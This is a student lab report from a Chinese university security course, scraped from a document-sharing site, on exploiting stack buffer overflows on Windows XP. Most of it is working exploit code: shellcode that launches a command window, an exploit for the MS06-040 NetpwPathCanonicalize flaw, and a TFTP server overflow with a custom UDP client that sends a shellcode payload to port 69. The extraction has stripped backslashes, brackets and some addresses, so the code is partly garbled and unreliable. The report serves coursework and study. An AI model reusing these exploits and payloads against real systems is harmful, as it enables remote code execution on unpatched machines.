《缓冲区溢出实验报告(共15页).doc》由会员分享,可在线阅读,更多相关《缓冲区溢出实验报告(共15页).doc(15页珍藏版)》请在taowenge.com淘文阁网|工程机械CAD图纸|机械工程制图|CAD装配图下载|SolidWorks_CaTia_CAD_UG_PROE_设计图分享下载上搜索。
1、精选优质文档-倾情为你奉上华中科技大学计算机学院信息系统应用安全实验报告实验名称 缓冲区溢出实验 团队成员:姓 名班 级学 号贡献百分比得 分高涛信安0703班U100%注:团队成员贡献百分比之和为1教师评语:一. 实验环境n 操作系统:Windows XP SP3n 编译平台:Visual C+ 6.0n 调试环境:OllyDbg二. 实验目的1. 掌握缓冲区溢出的原理;2. 掌握缓冲区溢出漏洞的利用技巧;3. 理解缓冲区溢出漏洞的防范措施。三. 实验内容及步骤1. 缓冲区溢出漏洞产生的的基本原理和攻击方法n 缓冲区溢出模拟程序程序源代码如下:#include string.h#includ
2、e stdio.h#include/char name=AAAAAAAAAAAAAAAA;char name=AAAAAAAAAAAAABCD;int main()char output8;strcpy(output, name);/内存拷贝,如果name长度超过8,则出现缓冲区溢出for(int i=0;i8&outputi;i+) printf(0x%x,outputi);printf(n);return 0;运行该程序产生访问异常:由于拷贝字符串时产生缓冲区溢出,用“ABCD”字符串的值覆盖了原来EIP的值,所以main函数返回时EIP指向,引发访问异常。n 运行命令窗口的shellco
3、deshellcode测试代码如下:#include string.h#include stdio.h#includechar name= x41x41x41x41 x41x41x41x41 x41x41x41x41 /覆盖ebp x12x45xfax7f /覆盖eip, jmp esp地址7ffa4512 x55x8bxecx33xc0x50x50x50xc6x45xf4x6d xc6x45xf5x73xc6x45xf6x76xc6x45xf7x63 xc6x45xf8x72xc6x45xf9x74xc6x45xfax2e xc6x45xfbx64xc6x45xfcx6cxc6x45xfdx
4、6c x8dx45xf4x50xb8 x77x1dx80x7c / LoadLibraryW的地址 xffxd0 x55x8bxecx33xffx57x57x57xc6x45xf4x73 xc6x45xf5x74xc6x45xf6x61xc6x45xf7x72 xc6x45xf8x74xc6x45xf9x20xc6x45xfax63 xc6x45xfbx6dxc6x45xfcx64x8dx7dxf4x57 xba xc7x93xbfx77 / System 的地址 xffxd2; int main()char output8;strcpy(output, name);for(int i=0;i
5、8&outputi;i+) printf(0x%x,outputi);printf(n);return 0;shellcode测试代码运行效果如下:由于把main函数的返回EIP地址替换成了jmp esp的地址,main函数返回的时候就会执行我们的shellcode代码。该shellcode,运行命令窗口。2. MS06-040 缓冲区溢出漏洞分析和利用n 溢出点定位溢出点定位源代码#include typedef void (*MYPROC)(LPTSTR);int main()char arg_10x320;char arg_20x440;int arg_3=0x440;char arg_
6、40x100;long arg_5=44;int i=0; HINSTANCE LibHandle;MYPROC Trigger;char dll = ./netapi32.dll; char VulFunc = NetpwPathCanonicalize;LibHandle = LoadLibrary(dll);/加载当前目录的netapi32.dllTrigger = (MYPROC) GetProcAddress(LibHandle, VulFunc);/获得NetpwPathCanonicalize的调用地址/填充参数memset(arg_1,0,sizeof(arg_1);/先清零内
7、存memset(arg_1,a,sizeof(arg_1)-2);/必须使用null结束符,填充aarg_1792=c;arg_1793=c;arg_1794=c;arg_1795=c;memset(arg_4,0,sizeof(arg_4);/先清零内存memset(arg_4,b,sizeof(arg_4)-2);/必须使用null结束符,填充b(Trigger)(arg_1,arg_2,arg_3,arg_4,&arg_5,0);/调用NetpwPathCanonicalizeFreeLibrary(LibHandle);return 0;程序运行效果如下:可以看到错误访问地址为,即为c
8、的编码,所以成功得定位了溢出点。n 漏洞利用漏洞利用的源代码如下:#include typedef void (*MYPROC)(LPTSTR);char shellcode=xFCx68x6Ax0Ax38x1Ex68x63x89xD1x4Fx68x32x74x91x0Cx8BxF4x8Dx7ExF4x33xDBxB7x04x2BxE3x66xBBx33x32x53x68x75x73x65x72x54x33xD2x64x8Bx5Ax30x8Bx4Bx0Cx8Bx49x1Cx8Bx09x8Bx69x08xADx3Dx6Ax0Ax38x1Ex75x05x95xFFx57xF8x95x60x8Bx4
9、5x3Cx8Bx4Cx05x78x03xCDx8Bx59x20x03xDDx33xFFx47x8Bx34xBBx03xF5x99x0FxBEx06x3AxC4x74x08xC1xCAx07x03xD0x46xEBxF1x3Bx54x24x1Cx75xE4x8Bx59x24x03xDDx66x8Bx3Cx7Bx8Bx59x1Cx03xDDx03x2CxBBx95x5FxABx57x61x3Dx6Ax0Ax38x1Ex75xA9x33xDBx53x68x77x65x73x74x68x66x61x69x6Cx8BxC4x53x50x50x53xFFx57xFCx53xFFx57xF8;int mai
10、n()char arg_10x320;char arg_20x440;int arg_3=0x440;char arg_40x100;long arg_5=44;HINSTANCE LibHandle;MYPROC Trigger;char dll = ./netapi32.dll; char VulFunc = NetpwPathCanonicalize;LibHandle = LoadLibrary(dll);Trigger = (MYPROC) GetProcAddress(LibHandle, VulFunc);memset(arg_1,0,sizeof(arg_1);memset(a
11、rg_1,0x90,sizeof(arg_1)-2);memset(arg_4,0,sizeof(arg_4);memset(arg_4,a,sizeof(arg_4)-2);memcpy(arg_4,shellcode,168);arg_10x318=0xF9;/ CALL ECX 的地址arg_10x319=0x52;arg_10x31A=0x18;arg_10x31B=0x75;(Trigger)(arg_1,arg_2,arg_3,arg_4,&arg_5,0);FreeLibrary(LibHandle);漏洞利用的效果如下:可以看到成功的利用该漏洞,弹出了一个对话框。3. TFTP
12、D溢出漏洞分析与利用n 溢出点定位1.构造FUZZtftp 127.0.0.1 get AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
13、AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAFUZZ中包含288个A,这个值是通过多次测试获得的, 运行效果如下,可以看到发生了溢出:2.确定溢出点 采用284个A+1234的fuzz,运行效果如下:可以看到程序转到了,溢出点定位成功。3.程序中溢出点定位使用OllyDbg打开程序,首先找到recvfrom函数,方法是右键点击Search for选项,找到Name in current module,在其中找到recvfrom, 如下所示:从这里找到recvfrom函数的位置,在此设置断点:然后启动tftp,重新运行fuzz,程序会进入到断点,跟踪程序的运行过程,发现程序运
14、行到一个strcpy函数时造成溢出,如下图所示:运行A4函数之后,栈的状态如下,可以看到EIP被我们的数据覆盖:运行到下面的代码处,程序跳转到处,至此溢出点定位完毕。n 溢出漏洞利用分析首先肯定是想到利用JMP ESP,但是发现EIP后面是两个函数参数,如果覆盖该参数,将在函数返回之前触发异常,无法进入到我们的shellcode。从上图也可以看出,EIP后面的第二个参数恰好指向我们构造的字符串,那么如果我们能够把00E81F62送入EIP,可以发现函数返回之前的ESP指向010BF3C8,如果能够把ESP减去4,然后运行RET指令,就可以把00E81F62送入EIP,ESP-8相当于一次POP
15、操作,这样如果我们把EIP指向有:POP XRET代码串的指令地址,即可使得shellcode被执行,在系统DLL中搜索该指令串,发现在7FFC01B0处有该指令代码:这样就可以构造如下的shellcode:x55x8bxecx33xc0x50x50x50xc6x45xf4x6d / 12 xc6x45xf5x73xc6x45xf6x76xc6x45xf7x63 / 24 xc6x45xf8x72xc6x45xf9x74xc6x45xfax2e / 36 xc6x45xfbx64xc6x45xfcx6cxc6x45xfdx6c / 48 x8dx45xf4x50xb8 / 53 x77x1dx
16、80x7c / LoadLibraryW的地址 / 57 xffxd0 / 59 x55x8bxecx33xffx57x57x57xc6x45xf4x73 / 71xc6x45xf5x74xc6x45xf6x61xc6x45xf7x72 / 83 xc6x45xf8x74xc6x45xf9x20xc6x45xfax63 / 95 xc6x45xfbx6dxc6x45xfcx64x8dx7dxf4x57 / 107xba / 108 xc7x93xbfx77 / System 的地址 / 112 xffxd2 / 114 x90x90x90x90 / 118x90x90x90x90x90x90x
17、90x90x90x90/ 128x90x90x90x90x90x90x90x90x90x90/ 138x90x90x90x90x90x90x90x90x90x90/ 148x90x90x90x90x90x90x90x90x90x90/ 158x90x90x90x90x90x90x90x90x90x90/ 168x90x90x90x90x90x90x90x90x90x90/ 178x90x90x90x90x90x90x90x90x90x90/ 188x90x90x90x90x90x90x90x90x90x90/ 198x90x90x90x90x90x90x90x90x90x90/ 208x90x
18、90x90x90x90x90x90x90x90x90/ 218x90x90x90x90x90x90x90x90x90x90/ 228x90x90x90x90x90x90x90x90x90x90/ 238x90x90x90x90x90x90x90x90x90x90/ 248x90x90x90x90x90x90x90x90x90x90/ 258x90x90x90x90x90x90x90x90x90x90/ 268x90x90x90x90x90x90x90x90x90x90/ 278x90x90x90x90x90x90 / 284xB0x01xFCx7F / EIP地址 / 288该shellcod
19、e为弹出一个命令窗口的shellcode,EIP指向7FFC01B0,按照上面的分析,程序将运行shellcode。n 漏洞利用直接在fuzz中加入EIP跳转地址7FFC01B0,构造fuzz如下284个A + 0xB0 + 0x01 + 0xFC + 0x7F,发送到服务器端,发现实际地址不对:发现这是因为tftp发送的时候只能发送有效的字符,而无效的字符无法发送过去,这样我们必须自己实现tftp客户端,程序代码如下:#include #include #include / 弹出命令框的Shell长度#define CMD_SHELL_LENGTH 300/ 弹出命令框的shellcodec
20、har cmdshellCMD_SHELL_LENGTH + 1= x00x01 / 2x55x8bxecx33xc0x50x50x50xc6x45xf4x6d / 14 xc6x45xf5x73xc6x45xf6x76xc6x45xf7x63 / 26 xc6x45xf8x72xc6x45xf9x74xc6x45xfax2e / 38 xc6x45xfbx64xc6x45xfcx6cxc6x45xfdx6c / 50 x8dx45xf4x50xb8 / 55 x77x1dx80x7c / LoadLibraryW的地址 / 59 xffxd0 / 61 x55x8bxecx33xffx57x
21、57x57xc6x45xf4x73 / 73xc6x45xf5x74xc6x45xf6x61xc6x45xf7x72 / 85 xc6x45xf8x74xc6x45xf9x20xc6x45xfax63 / 97 xc6x45xfbx6dxc6x45xfcx64x8dx7dxf4x57 / 109xba / 110 xc7x93xbfx77 / System 的地址 / 114 xffxd2 / 116 x90x90x90x90 / 120x90x90x90x90x90x90x90x90x90x90/ 130x90x90x90x90x90x90x90x90x90x90/ 140x90x90x90
22、x90x90x90x90x90x90x90/ 150x90x90x90x90x90x90x90x90x90x90/ 160x90x90x90x90x90x90x90x90x90x90/ 170x90x90x90x90x90x90x90x90x90x90/ 180x90x90x90x90x90x90x90x90x90x90/ 190x90x90x90x90x90x90x90x90x90x90/ 200x90x90x90x90x90x90x90x90x90x90/ 210x90x90x90x90x90x90x90x90x90x90/ 220x90x90x90x90x90x90x90x90x90x9
23、0/ 230x90x90x90x90x90x90x90x90x90x90/ 240x90x90x90x90x90x90x90x90x90x90/ 250x90x90x90x90x90x90x90x90x90x90/ 260x90x90x90x90x90x90x90x90x90x90/ 270x90x90x90x90x90x90x90x90x90x90/ 280x90x90x90x90x90x90 / 286xB0x01xFCx7F / EIP地址 / 290 x0netasciix0; / 300void main()WORD wVersionRequested; / 版本数据 WSADATA
24、 wsaData; / 初始化数据 int err; / 返回错误码/ 初始化版本字段 wVersionRequested = MAKEWORD(2,2);/ 初始化库 err = WSAStartup(wVersionRequested,&wsaData); if(err != 0) return; if(LOBYTE(wsaData.wVersion) != 2 | HIBYTE(wsaData.wHighVersion) != 2) WSACleanup(); return ; / 构造SOCKET SOCKET sockClient=socket(AF_INET,SOCK_DGRAM,
25、0); / 初始化地址字段 SOCKADDR_IN addrSrv; addrSrv.sin_addr.S_un.S_addr=inet_addr(127.0.0.1); addrSrv.sin_family=AF_INET; addrSrv.sin_port=htons(69);/ 发送shellcodesendto(sockClient,cmdshell,CMD_SHELL_LENGTH,0,(SOCKADDR*)&addrSrv,sizeof(SOCKADDR); / 关闭套接字 closesocket(sockClient);/ 清理库信息 WSACleanup(); 运行该代码的效果
26、如下:这样就成功的利用了该漏洞。四. 实验中的问题及心得程序中遇到了很多问题,由于前面的实验只是验证性的,我主要说明做最后一个实验中遇到的问题与心得:1. 溢出点定位时遇到的问题溢出点定位应该是很简单的,但是这里的一个问题是字符串长了会覆盖参数,引起异常,我最初就以为溢出点位置为292个字符,因为我发现有292个字符时,产生了EIP的跳转,而实际上这是由于参数异常引起的,后来在同学的提醒在才意识到这个问题。2. 溢出利用时的问题溢出漏洞利用时,这里不能用JMP ESP,我开始就想这怎么利用呢?后来在同学的帮助下,意识到可以巧妙的利用第二个参数跳转,后来发现这个利用思路真的是很巧妙。利用时的另一个问题是非法字符不能通过命令行直接发送,这样必须自己实现tftp客户端。3. 实验心得通过实验,我对缓冲区溢出漏洞有了一个比较清晰的认识。对利用的方法也有了一个比较详细的了解,可以说获益匪浅。专心-专注-专业